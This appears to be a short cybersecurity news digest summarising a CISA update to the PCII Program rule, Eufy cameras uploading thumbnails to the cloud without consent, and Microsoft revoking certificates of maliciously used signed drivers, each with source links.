The Department of Homeland Security (DHS) and the Cybersecurity and Infrastructure Security Agency (CISA) amended the Protected Critical Infrastructure Information (PCII) Program regulation with non-substantive, technical edits. The goals of these changes are to improve and modernize aspects of the PCII Program and to help critical infrastructure owners/operators, state and local governments, and other important stakeholders more effectively use the PCII Program.


Sources

https://www.cisa.gov/blog/2022/12/21/cisa-publishes-technical-rule-update-protected-critical-infrastructure-information

Overview

Eufy, a line of security cameras produced by Anker, has been flagged for sending footage to the cloud despite claiming that recorded data is stored only on the physical device itself. In order to notify users of new footage, a thumbnail is sent through the cloud which includes images of faces, used for facial recognition, and other data. There is an option to turn off this functionality, but users still found data saved this way without their consent. Even when the option is toggled off, the thumbnail data remains accessible through the server. Eufy commented on the incident, stating that the data is never public and that viewing it requires a URL along with correct credentials and a time-sensitive link. The only fix as of now is to update the language in the terms used with customers and owners of the cameras.

Sources

https://www.macrumors.com/2022/11/29/eufy-camera-cloud-uploads-no-user-consent/

https://www.theverge.com/2022/11/30/23486753/anker-eufy-security-camera-cloud-private-encryption-authentication-storage

Overview

Microsoft completed its investigation regarding Microsoft Windows Hardware Developer Program-certified drivers that were being used maliciously in post-exploitation activity. The investigation, which was launched in late October of 2022, determined that the activity was limited in nature and that no compromise of the program itself was identified. To protect customers from the threat, Microsoft released Windows Security Updates to revoke the certificates for the impacted files, suspended the partners’ seller accounts, and deployed blocking detections (Microsoft Defender 1.377.987.0 and newer).


Source

https://msrc.microsoft.com/update-guide/vulnerability/ADV220005
